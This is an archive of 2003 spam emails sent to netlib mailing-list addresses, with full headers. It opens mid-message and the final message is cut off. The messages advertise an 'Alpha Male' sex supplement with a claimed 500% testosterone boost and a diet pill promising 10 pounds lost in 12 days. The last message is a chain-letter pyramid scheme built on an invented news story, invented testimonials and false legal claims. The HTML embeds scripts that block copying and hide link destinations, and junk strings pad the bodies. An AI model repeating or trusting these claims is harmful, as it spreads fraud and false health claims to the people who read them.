document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
awnvco g wvmxuupnlyyqc spvr jfp k
</body>
</html>
p iphydasnombvloe
muvjg
dquy  u t syephfw cv lz 
g

--8146_21.B995_2_FA0--


From harold@msn.com Fri Dec 12 14:58:52 2003
Return-Path: <harold@msn.com>
Received: from 216-229-77-140-cablemodem-sllv.fidnet.com (216-229-77-140-cablemodem-sllv.fidnet.com [216.229.77.140])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCJwnMN009766;
	Fri, 12 Dec 2003 14:58:49 -0500 (EST)
Received: from [5.49.162.118] by 216-229-77-140-cablemodem-sllv.fidnet.com with ESMTP id 57633647 for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 12 Dec 2003 23:55:31 +0400
Message-ID: <a$gsx56qb-7-5dy-3f@gg8.ez.671ld1>
From: "Adela Fish" <harold@msn.com>
Reply-To: "Adela Fish" <harold@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Quick there she is ! Now impess her,, ftt
Date: Fri, 12 Dec 03 23:55:31 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A7C__BF1_1F3D.8A1987D."
X-Priority: 3
X-MSMail-Priority: Normal


--A7C__BF1_1F3D.8A1987D.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Quick there she is ! Now impess her,, ftt
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
tz  yp nu
bwatvd ogpxsh y lasikbn
vn ls  
evmnagmlg fk 
</body>
</html>
bwc mq
rt zlfety

--A7C__BF1_1F3D.8A1987D.--


From harold@msn.com Fri Dec 12 15:26:08 2003
Return-Path: <harold@msn.com>
Received: from nken-u1-c3b-175.miamfl.adelphia.net (nken-u1-c3b-175.miamfl.adelphia.net [24.55.128.175])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCKQ7MN010500;
	Fri, 12 Dec 2003 15:26:07 -0500 (EST)
Received: from [217.58.165.70] by nken-u1-c3b-175.miamfl.adelphia.net; Fri, 12 Dec 2003 18:23:48 -0200
Message-ID: <83-$-$s6s2rj5@9x0.7ryv>
From: "Alisa Baker" <harold@msn.com>
Reply-To: "Alisa Baker" <harold@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: alpha will possess your woman sjnypc  icjuqxs jx
Date: Fri, 12 Dec 03 18:23:48 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F716F.B73B8.77._B"
X-Priority: 3
X-MSMail-Priority: Normal


--F716F.B73B8.77._B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>alpha will possess your woman sjnypc  icjuqxs jx
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
aoffw
</body>
</html>
lg  bhqmszplxlh

g ufd lp qj jm ytve
xrkla
fuooy tcwluwuanrocmbufr

--F716F.B73B8.77._B--


From jfa9hs@microsoft.com Fri Dec 12 18:06:38 2003
Return-Path: <jfa9hs@microsoft.com>
Received: from 160.36.58.108 ([219.145.84.234])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCN6SMN013259;
	Fri, 12 Dec 2003 18:06:33 -0500 (EST)
Received: from [69.135.182.200] by 160.36.58.108 id <6875431-55080>; Sat, 13 Dec 2003 10:01:57 +0100
Message-ID: <2q-n-p$z-310$dvw$7dc$h-6-14f@6xt.r1i.10p>
From: "Lyman Serrano" <jfa9hs@microsoft.com>
Reply-To: "Lyman Serrano" <jfa9hs@microsoft.com>
To: blast-lb-archive@netlib2.cs.utk.edu
Cc: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Fed UP with fad diets? pq
Date: Sat, 13 Dec 03 10:01:57 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A2B._FABFB.5D526_05091"
X-Priority: 3
X-MSMail-Priority: Normal


--A2B._FABFB.5D526_05091
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<br>
<img src=3D"http://www.procitravin.com/graphics/mailer_citravin6.jpg"></a>=
<P>
<br>
Take your low carb diet to a new level. With all natural ProCitravin you'l=
l lose
an additional 10 pounds every 12 days or your money back!
<P>
<a href=3D"http://www.procitravin.com/index14.html">http://www.procitravin=
com/index14.html</a>
<P><P><mzky>em pakmczpvtcf gliq 
</body>
</html>hygrclby 
  nlyquc u
y vfktys hfq  xbpxvgb  kpm pghs
c  gdxdyirsrgfmlywcac
t lvmcb

--A2B._FABFB.5D526_05091--


From xi32qvrzv@mail.de Sat Dec 13 06:17:46 2003
Return-Path: <xi32qvrzv@mail.de>
Received: from host217-35-89-205.in-addr.btopenworld.com (host217-35-89-205.in-addr.btopenworld.com [217.35.89.205])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBDBHWMN026726;
	Sat, 13 Dec 2003 06:17:39 -0500 (EST)
Received: from [211.191.30.153] by host217-35-89-205.in-addr.btopenworld.com id Hg4FdlH926w6; Sun, 14 Dec 2003 02:12:04 +0500
Message-ID: <fohsjhtd2m94q0c1i7-$8xv5v9@j9stg>
From: "Ollie Voss" <xi32qvrzv@mail.de>
Reply-To: "Ollie Voss" <xi32qvrzv@mail.de>
To: blast-lite-archive@netlib2.cs.utk.edu
Cc: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>
Subject: Speed Up low carb weight loss qg ealcjhr
Date: Sun, 14 Dec 03 02:12:04 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".E_.F9_4_B1AC.23A.D"
X-Priority: 3
X-MSMail-Priority: Normal


--.E_.F9_4_B1AC.23A.D
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

pompeii

you will lose 10 pounds in 12 days guaranteed with procitravin. Chemical
free, epherda free with no shakes or jitters. Natural weight loss
guaranteed to work or your money back!

http://www.procitravin.com/index13.html


servile 7:)joed  ix  mpvc x tn
euvnb
kp amdtn jm q 

--.E_.F9_4_B1AC.23A.D--


From mce7jqpso@granite.sentex.ca Sat Dec 13 09:48:15 2003
Return-Path: <mce7jqpso@granite.sentex.ca>
Received: from c-66-41-100-199.mn.client2.attbi.com (c-66-41-100-199.mn.client2.attbi.com [66.41.100.199])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBDEm2MN029084
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 13 Dec 2003 09:48:06 -0500 (EST)
Received: from [244.202.189.134]
	by c-66-41-100-199.mn.client2.attbi.com with ESMTP id <889220-03664>;
	Sat, 13 Dec 2003 14:43:47 +0000
Message-ID: <y-qo8-yeo59-o70k6$1$6---810@v1l6ko17nz>
From: "Beverley Hairston" <mce7jqpso@granite.sentex.ca>
Reply-To: "Beverley Hairston" <mce7jqpso@granite.sentex.ca>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: More testimonials later but first... gbbd ejd dvdtlzm
Date: Sat, 13 Dec 03 14:43:47 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8AEA2B.9.BB.8D0_"
X-Priority: 3
X-MSMail-Priority: Normal


--8AEA2B.9.BB.8D0_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">

</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask them if they want to re-enter the progra=
m =FFFFFF96 that's what I always did.</font><font face=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

